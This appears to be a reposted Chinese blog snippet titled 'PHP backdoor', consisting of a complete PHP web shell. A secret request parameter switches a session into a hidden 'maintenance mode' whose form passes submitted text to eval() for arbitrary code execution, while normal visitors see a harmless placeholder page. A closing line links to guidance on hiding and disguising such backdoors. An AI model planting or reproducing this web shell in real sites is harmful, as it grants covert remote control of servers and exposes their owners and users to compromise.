<?php
@session_start();
// 进入/退出维护模式
if(isset($_REQUEST['secret']) && $_REQUEST['secret'] == '{THE_BACKDOOR_SECRET}') {
if(isset($_SESSION['mode'])) unset($_SESSION['mode']);
else $_SESSION['mode'] = 'maintenance';
header("Location: {$_SERVER["PHP_SELF"]}");
exit();
}
// 维护模式内的逻辑
elseif(isset($_SESSION['mode']) && $_SESSION['mode'] == 'maintenance') {
if(isset($_POST['exec'])) {
eval($_POST['exec']);
} else {?>
<h1>维护模式</h1>
<form method="post" target="result">
<textarea name="exec"></textarea>
<input type="submit" />
</form>
<iframe id="result" name="result" width="800" height="600"></iframe>
<?php }
exit();
}
// 非维护模式的正常展现
?><!DOCTYPE html>
<html>
<head>
<title>功能页面</title>
</head>
<body>
<h1>这是一个正常的页面</h1>
</body>
</html>
如何隐藏伪装:http://www.freebuf.com/articles/web/33824.html
【转载请附】愿以此功德,回向 >>
原文链接:http://www.huangwenchao.com.cn/2015/05/php-backdoor.html【PHP 后门】